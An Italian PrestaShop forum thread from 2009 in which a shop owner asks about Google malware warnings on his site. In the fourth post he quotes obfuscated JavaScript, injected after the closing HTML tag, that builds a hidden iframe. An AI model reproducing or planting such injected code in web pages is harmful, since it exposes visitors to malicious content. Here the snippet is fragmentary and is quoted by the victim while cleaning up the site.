carloalberto Posted June 4, 2009 Share Posted June 4, 2009 Mi presento,Ho usato molti Opensource E-commerce ma devo dire che prestashop è veramente OTTIMO!ho creato il seguente sito: RIMOSSO!ma ora mio trovo ad aver un problemone...Alcuni utenti mi segnalano che Google sconsiglia di procedere nella visita al sito a causa di possibili MalwareChe vuol dire? a me non capita? a voi??Cortesemente chi legge questo topic, mi fa un controllo e mi dice cosa succede.Se avete una soluzione, sono tutto orecchi!GRAZIE MILLE PER QUANTO AVETE FATTO E PER QUANTO FARETE ANCORA! Link to comment Share on other sites More sharing options...
disarci Posted June 4, 2009 Share Posted June 4, 2009 Ciao,non hai nessun malware sul tuo sito....ma qualcuno che ti vuole male....ti rispondo in PM visto che è un argomento delicato Link to comment Share on other sites More sharing options...
carloalberto Posted June 4, 2009 Author Share Posted June 4, 2009 Grazie mille per il controllo, tuttavia se qualcuno aprendo il sito dovesse avere questo problema, mi scriva pure!Grazie!! Link to comment Share on other sites More sharing options...
carloalberto Posted June 4, 2009 Author Share Posted June 4, 2009 PROPRIO ORA un utente mi ha segnalato la presenza di un malware sul mio sito.E mi dice che andando a vedere il codice html ha trovato del codice javascript un pochino strano dopo il tag </html>: [removed]q="=hgs`ld!rsb<&whrhchmhux;iheedo&?=.hgs`ld?";w="";for(i=0;i[removed](w);[removed][removed]q="=hgs`ld!rsb<0!idhfiu<0!ruxmd<&whrhchmhux;iheedo&?=.hgs`ld?";w="";for(i=0;i[removed](w);[removed][removed]q="=hgs`ld!rsb<0!idhfiu<0!ruxmd<&whrhchmhux;iheedo&?=.hgs`ld?";w="";for(i=0;i;[removed](w);Secondo lui ho subito qualche attacco che hanno sfruttato le vulnerabilita' del mio hosting (SITEGROUND) o dello script che uso in php ( PRESTASHOP) Link to comment Share on other sites More sharing options...
carloalberto Posted June 4, 2009 Author Share Posted June 4, 2009 Ho rimosso la suddetta riga - funziona tutto.Non si spiega come sia entrata...Se qualcuno aprendo il sito dovesse vedere malware mi scriva un messaggio!GRAZIE A TUTTI! Link to comment Share on other sites More sharing options...
Recommended Posts